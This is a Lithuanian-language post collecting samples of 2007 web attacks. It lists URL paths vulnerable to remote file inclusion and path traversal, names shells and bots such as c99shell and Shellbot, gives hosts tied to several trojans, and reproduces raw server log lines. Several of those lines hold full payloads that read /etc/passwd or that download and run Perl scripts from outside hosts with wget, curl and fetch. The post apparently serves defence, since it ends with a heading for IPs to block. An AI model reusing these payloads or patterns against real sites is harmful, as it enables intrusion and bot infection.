Pateikiu Jums sarašą svetainių kurios turi php/perl
skriptų skirtų svetainių atakoms rengti (arba trojanai/wormsai).

Svetainių sarašas

/index2.php?x=<site>
/index.php?x=../../../../../../etc/passwd
/main.php?x=<site>
/error.php?dir=<site>
/main.inc&G_PATH=<site>
/htmltonuke.php?filnavn=<site>
/upgrade_album.php?GALLERY_BASEDIR=<site>
&mosConfig_absolute_path=<site>
/admin.php?cal_dir=<site>
/lib.inc.php?pm_path=<site>
/mainfile.php?MAIN_PATH=<site>
/contacts.php?cal_dir=<site>
/include.php?gorumDir=<site>
/step_one_tables.php?server_inc=<site>
/viewgantt.php?root_dir=<site>
/index.php?site=<site>
/index.php?content=<site>
/index.php?content=<any file>
/index.php?visualizar=<site>
/addevent.inc.php?agendax_path=<site>
/displayCategory.php?adminpath=<site>
/theme.php?THEME_DIR=<site>
/vw_usr_roles.php?baseDir=<site>
/initdb.php?absolute_path=<site>
/db.php?path_local=<site>

• RFI Vulnerability Skaneris
• c99shell
• cmdphp_shell
• Shellbot
• No.txt
• ddos.pl
• lila.jpg
• safe.txt
• id.txt
• sela.txt
• asc
• mic22

[Sober trojanas]
home.arcor.de
scifi.pages.at
home.pages.at
free.pages.at
people.freenet.de

[Hotword trojanas]
ftp.targetdata.biz
ftp.alrobertspublishing.com
bp007.no-ip.com

[Warg Botas]
media.pixpond.com/l9rd

87.106.75.16 - - [12/Jul/2007:12:48:32 -0300] "GET /wiki/index.php//skin/zero_vote/error.php?dir=http://geocities.yahoo.com.br/google3089/cmd.html?&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/leto/kk.txt;wget%20http://tw0team.name/leto/kk.txt;fetch%20http://tw0team.name/leto/kk.txt;curl%20-O%20http://tw0team.name/leto/kk.txt;perl%20kk.txt;rm%20-rf%20kk*? HTTP/1.1" 200 7024 "-" "libwww-perl/5.803"

213.251.187.110 - - [10/Jul/2007:05:00:57 -0300] "GET /dcid/install/index.php?lng=../../include/main.inc&G_PATH=http://legendlist.altervista.org/stringa.txt? HTTP/1.1" 200 6359 "-" "libwww-perl/5.803"

212.68.197.6 - - [10/Jul/2007:14:29:20 -0300] "GET //index.php?link=http://geocities.yahoo.com.br/google3089/cmd.html?&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/x/bn.txt;wget%20http://tw0team.name/x/bn.txt;fetch%20http://tw0team.name/x/bn.txt;curl%20-O%20http://tw0team.name/x/bn.txt;perl%20bn.txt;rm%20-rf%20bn*? HTTP/1.1" 200 6235 "-" "libwww-perl/5.76"

216.120.227.52 - - [18/Jul/2007:07:55:43 -0300] "GET /dcid/*install/index.php?lng=../../include/main.inc&G_PATH=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 6361 "-" "libwww-perl/5.803"

212.184.187.186 - - [17/Jul/2007:17:28:19 -0300] "GET //install/index.php?lng=../../include/main.inc&G_PATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 200 6235 "-" "libwww-perl/5.63"

208.116.38.148 - - [17/Jul/2007:18:31:13 -0300] "GET //install/index.php?lng=../../include/main.inc&G_PATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 200 6235 "-" "libwww-perl/5.79"

201.17.129.24 - - [22/Jul/2007:21:46:26 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://usuarios.lycos.es/poizonbox/r57.txt?? HTTP/1.1" 200 6349 "-" "libwww-perl/5.803"

69.64.37.77 - - [21/Jul/2007:16:51:25 -0300] "GET /wiki/index.php?title=Samples_of_attac...ed_by_ossec&printable=yes/install/index.php?lng=../../include/main.inc&G_PATH=http://www.visiontech-india.com/articles/images/logo2.jpg? HTTP/1.1" 200 7063 "-" "libwww-perl/5.79"

62.141.39.43 - - [26/Jul/2007:10:14:16 -0300] "GET /wiki/index.php//install/index.php?lng=../../include/main.inc&G_PATH=http://mendesrs.bravehost.com/id.txt? HTTP/1.1" 200 6933 "-" "libwww-perl/5.76"

85.12.31.79 - - [26/Jul/2007:18:13:09 -0300] "GET /wiki/index.php/WebAttacks_links//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7197 "-" "libwww-perl/5.806"

216.120.237.150 - - [26/Jul/2007:19:37:43 -0300] "GET //skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 6235 "-" "libwww-perl/5.806"

66.156.76.235 - - [27/Jul/2007:00:12:18 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7280 "-" "libwww-perl/5.76"

216.120.237.150 - - [28/Jul/2007:22:38:12 -0300] "GET /wiki/index.php//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7010 "-" "libwww-perl/5.806"

62.210.190.242 - - [28/Jul/2007:20:16:23 -0300] "GET /wiki/index.php?title=Index.php&printable=yes/*install/index.php?lng=../../include/main.inc&G_PATH=http://guilde-wow.nuxit.net/main? HTTP/1.1" 200 6762 "-" "libwww-perl/5.803"

216.200.125.254 - - [31/Jul/2007:22:01:12 -0300] "GET /htmltonuke.php?filnavn=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 6291 "-" "libwww-perl/5.75"

216.200.125.254 - - [31/Jul/2007:22:16:20 -0300] "GET /wiki/index.php/htmltonuke.php?filnavn=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 6884 "-" "libwww-perl/5.75"

216.200.125.254 - - [01/Aug/2007:11:12:28 -0300] "GET /wiki/index.php//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 7120 "-" "libwww-perl/5.75"

69.14.231.114 - - [01/Aug/2007:18:32:00 -0300] "GET /wiki/index.php/main.php?x=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../rox.txt? HTTP/1.1" 200 6834 "-" "libwww-perl/5.79"

69.14.231.114 - - [01/Aug/2007:22:26:47 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/default.php?page=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../zip.txt? HTTP/1.1" 200 7153 "-" "libwww-perl/5.79"

86.109.164.220 - - [07/Aug/2007:15:01:59 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/index.php?p=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 500 607 "-" "libwww-perl/5.79"

74.53.90.130 - - [07/Aug/2007:15:37:44 -0300] "GET /main.php?x=http://ankerz.phpnet.us/Qe3? HTTP/1.1" 500 607 "-" "libwww-perl/5.808"

209.216.253.180 - - [15/Aug/2007:15:47:04 -0300] "GET /dcid/?p=6/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),500(webadmin),2522(psaserv)%0A? HTTP/1.1" 200 11307 "-" "libwww-perl/5.65"

72.22.90.110 - - [15/Aug/2007:03:31:09 -0300] "GET /wiki/index.php/main.php?page=uid=10004(unix)%20gid=10004(unix)%20groups=10004(unix)%0A? HTTP/1.1" 200 6440 "-" "libwww-perl/5.803"

217.160.21.98 - - [14/Aug/2007:19:55:18 -0300] "GET /wiki/index.php/RFI_%3Cwbr%20/%3EVulnerability_scanner//skin/zero_vote/error.php?dir=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 200 6117 "-" "libwww-perl/5.803"

218.38.19.40 - - [27/Aug/2007:20:07:45 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"

218.38.19.40 - - [27/Aug/2007:20:07:02 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"

202.67.153.151 - - [26/Aug/2007:21:55:23 -0300] "GET /wiki/admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"

202.67.153.151 - - [26/Aug/2007:21:55:22 -0300] "GET /admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"

202.67.153.151 - - [28/Aug/2007:20:48:40 -0300] "GET /wiki/modules/tasks/viewgantt.php?root_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.803"

212.59.7.10 - - [29/Aug/2007:09:37:44 -0300] "GET /wiki/index.php/WebAttacks_links/index.php?lng=../../include/main.inc&G_PATH=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 200 6638 "-" "libwww-perl/5.65"

82.165.33.50 - - [05/Sep/2007:11:44:12 -0300] "GET /main.php?x=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 269 "-" "libwww-perl/5.69"

204.10.70.1 - - [07/Sep/2007:15:54:13 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.colorglo.it/oneadmin/calendar/.r/stringa.txt? HTTP/1.1" 200 6539 "-" "libwww-perl/5.65"

206.176.210.52 - - [07/Sep/2007:14:21:22 -0300] "GET /wiki/index.php/index.php?site=http://www.jungo8949.co.kr/tool25.txt?&cmd=cd%20/tmp;rm%20-rf%20*;cd%20/tmp;lwp-download%20http://triangle-uiuc.org/attack/zero.txt;fetch%20http://triangle-uiuc.org/attack/zero.txt;curl%20-o%20zero.txt%20http://triangle-uiuc.org/attack/zero.txt;wget%20http://triangle-uiuc.org/attack/zero.txt;perl%20zero.txt? HTTP/1.1" 200 6272 "-" "libwww-perl/5.65"

128.241.236.252 - - [09/Sep/2007:13:16:29 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.athleticbaby.com/public/templates_c/paged.gif? HTTP/1.1" 200 6539 "-" "libwww-perl/5.808"

128.241.236.252 - - [09/Sep/2007:13:28:33 -0300] "GET /wiki/index.php/OSSECWUI:Install/install/index.php?lng=../../include/main.inc&G_PATH=http://www.athleticbaby.com/public/templates_c/paged.gif? HTTP/1.1" 200 6726 "-" "libwww-perl/5.808"

209.240.96.35 - - [17/Sep/2007:13:51:52 -0300] "GET /wiki/index.php?content=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.805"

200.142.86.12 - - [14/Sep/2007:12:36:42 -0300] "GET /wiki/index.php//modules/agendax/addevent.inc.php?agendax_path=http://intrusion.hut2.ru/.../.../.../metodi.txt?? HTTP/1.1" 200 6704 "-" "libwww-perl/5.65"

81.169.128.26 - - [03/Oct/2007:03:44:22 -0300] "GET /wiki/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.69"

210.114.220.92 - - [04/Oct/2007:00:29:38 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 200 6539 "-" "libwww-perl/5.79"

202.133.244.140 - - [18/Sep/2007:17:08:46 -0300] "GET /wiki/index.php//hpgprojects/modules/admin/vw_usr_roles.php?baseDir='http://www.mk-design.com.tw/phpMyVisites/safe.txt? HTTP/1.1" 200 6814 "-" "libwww-perl/5.79"

Blokuotinų IP adresų sarašas